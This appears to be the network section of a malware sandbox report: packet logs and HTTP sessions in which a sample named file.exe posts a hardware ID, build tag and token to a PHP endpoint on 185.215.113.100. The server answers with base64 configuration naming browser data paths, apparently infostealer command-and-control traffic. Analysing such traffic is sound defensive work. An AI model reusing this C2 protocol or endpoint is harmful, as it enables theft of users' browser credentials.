              Sep 1, 2024 20:54:54.954622030 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.954704046 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.954726934 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.954741955 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.954770088 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.954775095 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.954792023 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.954793930 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.954807997 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.954813004 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.954830885 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.954852104 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.955364943 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.955408096 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.955456018 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.955467939 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.955495119 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.955504894 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.955835104 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.955881119 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.955900908 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.955914974 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:54.955944061 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:54.955959082 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.147217035 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.147238970 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.147274971 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.147340059 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.147352934 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.147372961 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.147399902 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.147399902 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.147399902 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.147424936 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.147424936 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.330929041 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.330990076 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.331012011 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.331027985 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.331054926 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.331070900 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.331631899 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.331648111 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.331661940 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.331676960 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.331682920 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.331693888 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.331705093 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.331736088 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.332083941 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.332134962 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.522526979 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.522562027 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.522682905 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.522705078 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.522705078 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.522722006 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.522766113 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.522780895 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.522809982 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.522828102 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.522918940 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.522965908 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.523273945 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.523324013 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.523369074 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.523381948 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.523420095 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.605988979 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.606031895 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.606169939 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.730228901 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.730246067 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.730271101 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.730298996 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.730314016 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.730339050 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.730379105 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.813812971 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.813838005 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.813999891 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.966597080 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.966613054 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:55.966651917 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:55.966674089 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.204884052 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.204924107 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.204941988 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.204952955 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.204979897 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.205163956 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205178022 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205192089 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205207109 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205208063 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.205223083 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205239058 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.205267906 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.205534935 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205548048 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205583096 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.205611944 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.205614090 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.205658913 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.209867954 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.209880114 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.209922075 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.339330912 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.339343071 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.339417934 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.339803934 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.339862108 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.339867115 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.339880943 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.339910030 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.339920998 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.409751892 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.409815073 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.409828901 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.409827948 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.409872055 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.535967112 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.536031008 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.536052942 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.536065102 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.536098957 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.606826067 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.606838942 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.606848955 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.606859922 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.606878042 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.606892109 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.606894970 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.606904984 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.606924057 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.606944084 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.742451906 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.742511988 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.742552996 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.742595911 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.826020956 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.826045036 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:56.826086044 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:56.826107979 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.147788048 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.147816896 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.147835970 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.147850990 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.147876978 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.147876978 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.357121944 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.357139111 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.357148886 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.357222080 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.357232094 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.357259989 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.357273102 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.357273102 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.357301950 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.357331038 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.357465982 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.357508898 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.440526009 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.440536976 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.440596104 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.570295095 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.570358038 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.570358038 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.570373058 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.570409060 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.916536093 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.916562080 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.916579008 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:57.916590929 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.916620970 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:57.916620970 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.119206905 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.119225025 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.119265079 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.119286060 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.372580051 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.372611046 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.372622967 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.372631073 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.372647047 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.372661114 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.564831972 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.564860106 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.564886093 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.564905882 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.564922094 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.564960957 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.648041010 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.648057938 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.648104906 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.772130013 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.772175074 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.772186995 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.772221088 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.772248983 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.809403896 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.809459925 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.809487104 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.809499025 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.809530020 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.809540987 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.978140116 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.978164911 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.978212118 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.978256941 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.978317022 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:58.978319883 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:58.978357077 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.016016006 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.016031027 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.016042948 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.016076088 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.016105890 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.061537981 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.061584949 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.061691046 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.061808109 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.206125021 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.206255913 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.206306934 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.249315023 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.249537945 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.249543905 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.249561071 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.249572039 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.249582052 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.249613047 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.332592010 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.332642078 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.332659006 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.332703114 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.465801001 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.465826988 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.465878010 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.465878010 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.753154039 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.753170967 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.753181934 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.753215075 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.753245115 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:54:59.753262997 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:54:59.753369093 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:55:00.014513969 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.014558077 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.014569998 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.014611006 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:55:00.014719009 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.014730930 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.014766932 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:55:00.014903069 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.014981985 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.015026093 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:55:00.015218019 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.015260935 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:55:00.015264988 CEST8049704185.215.113.100192.168.2.5
              Sep 1, 2024 20:55:00.015304089 CEST4970480192.168.2.5185.215.113.100
              Sep 1, 2024 20:55:00.028062105 CEST4970480192.168.2.5185.215.113.100
              • 185.215.113.100
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.549704185.215.113.100803424C:\Users\user\Desktop\file.exe
              TimestampBytes transferredDirectionData
              Sep 1, 2024 20:53:58.237189054 CEST90OUTGET / HTTP/1.1
              Host: 185.215.113.100
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 1, 2024 20:53:59.091248035 CEST203INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 18:53:58 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Content-Length: 0
              Keep-Alive: timeout=5, max=100
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Sep 1, 2024 20:53:59.094611883 CEST413OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGC
              Host: 185.215.113.100
              Content-Length: 211
              Connection: Keep-Alive
              Cache-Control: no-cache
              Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 45 33 30 31 41 33 36 35 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 2d 2d 0d 0a
              Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="hwid"F0E301A365B03555514232------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="build"leva------BKFCAFCFBAEHIDHJDBGC--
              Sep 1, 2024 20:53:59.416059971 CEST407INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 18:53:59 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 180
              Keep-Alive: timeout=5, max=99
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 4d 6d 51 78 4d 7a 45 31 4d 47 51 78 59 7a 5a 6a 4d 7a 55 32 4f 47 51 30 5a 6a 6c 6a 4e 57 49 7a 4e 32 52 6b 4f 47 56 6d 5a 6a 4e 6d 4e 6a 55 31 59 6d 59 33 5a 6d 59 34 4f 47 4a 6a 4f 44 4e 6a 4d 54 59 33 4d 44 4d 77 4f 54 64 68 4d 7a 51 77 4d 32 4e 6b 59 32 49 79 5a 6a 52 6c 4e 7a 64 6c 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
              Data Ascii: MmQxMzE1MGQxYzZjMzU2OGQ0ZjljNWIzN2RkOGVmZjNmNjU1YmY3ZmY4OGJjODNjMTY3MDMwOTdhMzQwM2NkY2IyZjRlNzdlfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
              Sep 1, 2024 20:53:59.418201923 CEST470OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJK
              Host: 185.215.113.100
              Content-Length: 268
              Connection: Keep-Alive
              Cache-Control: no-cache
              Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a
              Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="message"browsers------BGCBGCAFIIECBFIDHIJK--
              Sep 1, 2024 20:53:59.713977098 CEST1236INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 18:53:59 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 1520
              Keep-Alive: timeout=5, max=98
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
